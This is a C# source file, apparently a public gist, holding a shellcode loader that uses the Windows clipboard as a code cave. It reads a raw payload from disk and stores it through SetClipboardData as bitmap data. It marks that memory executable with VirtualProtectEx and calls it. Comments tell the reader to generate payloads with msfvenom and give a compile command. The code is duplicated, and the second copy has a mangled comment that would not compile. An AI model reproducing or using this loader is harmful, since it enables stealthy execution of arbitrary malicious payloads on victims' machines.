bigbrobro/ClippyShellcodeInject.cs

## ClippyShellcodeInject.cs
// Using the clipboard as your code cave.
// Generate your shellcode with msfvenom or whatever
// Example: msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o <outputfile.bin>
// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs

using System;
using System.IO;
using System.Runtime.InteropServices;

namespace ClippySCInject
{
    class Program
    {

        private delegate IntPtr test();
        static void Main(string[] args)
        {
            byte[] payload = File.ReadAllBytes(@"C:\path\to\raw\shellcode.bin");
            OpenClipboard(IntPtr.Zero);
            GCHandle payloadArray = GCHandle.Alloc(payload, GCHandleType.Pinned);
            IntPtr payloadpointer = payloadArray.AddrOfPinnedObject();

            // SetClipBoardData() formats that work:
            // CF_BITMAP = 0x2, CF_DSPBITMAP = 0x0082, CF_PALETTE = 0x9
            // https://docs.microsoft.com/en-us/windows/win32/dataxchg/standard-clipboard-formats

            IntPtr scData = SetClipboardData(0x2, payloadpointer); //CF_BITMAP = 0x2
            CloseClipboard();
            uint oldProtect = 0; //Old protect is RW by default
            if (VirtualProtectEx(GetCurrentProcess(), scData, (UIntPtr)payload.Length, 0x20/*RX*/, out oldProtect))
            {
                test executesc = (test)Marshal.GetDelegateForFunctionPointer(scData, typeof(test));
                executesc();
            }
        }

        [DllImport("User32.dll", EntryPoint= "OpenClipboard", SetLastError= true)]
        private static extern bool OpenClipboard(IntPtr hWndNewOwner);

        [DllImport("User32.dll", SetLastError = true)]
        static extern IntPtr SetClipboardData(uint uFormat, IntPtr hMem);

        [DllImport("user32.dll", SetLastError = true)]
        static extern bool CloseClipboard();

        [DllImport("kernel32.dll")]
        static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr GetCurrentProcess();

    }
}
	// Using the clipboard as your code cave.
	// Generate your shellcode with msfvenom or whatever
	// Example: msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o <outputfile.bin>
	// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs

	using System;
	using System.IO;
	using System.Runtime.InteropServices;

	namespace ClippySCInject
	{
	class Program
	{

	private delegate IntPtr test();
	static void Main(string[] args)
	{
	byte[] payload = File.ReadAllBytes(@"C:\path\to\raw\shellcode.bin");
	OpenClipboard(IntPtr.Zero);
	GCHandle payloadArray = GCHandle.Alloc(payload, GCHandleType.Pinned);
	IntPtr payloadpointer = payloadArray.AddrOfPinnedObject();

	// SetClipBoardData() formats that work:
	// CF_BITMAP = 0x2, CF_DSPBITMAP = 0x0082, CF_PALETTE = 0x9
	// https://docs.microsoft.com/en-us/windows/win32/dataxchg/standard-clipboard-formats

	IntPtr scData = SetClipboardData(0x2, payloadpointer); //CF_BITMAP = 0x2
	CloseClipboard();
	uint oldProtect = 0; //Old protect is RW by default
	if (VirtualProtectEx(GetCurrentProcess(), scData, (UIntPtr)payload.Length, 0x20/RX/, out oldProtect))
	{
	test executesc = (test)Marshal.GetDelegateForFunctionPointer(scData, typeof(test));
	executesc();
	}
	}

	[DllImport("User32.dll", EntryPoint= "OpenClipboard", SetLastError= true)]
	private static extern bool OpenClipboard(IntPtr hWndNewOwner);

	[DllImport("User32.dll", SetLastError = true)]
	static extern IntPtr SetClipboardData(uint uFormat, IntPtr hMem);

	[DllImport("user32.dll", SetLastError = true)]
	static extern bool CloseClipboard();

	[DllImport("kernel32.dll")]
	static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

	[DllImport("kernel32.dll", SetLastError = true)]
	public static extern IntPtr GetCurrentProcess();

	}
	}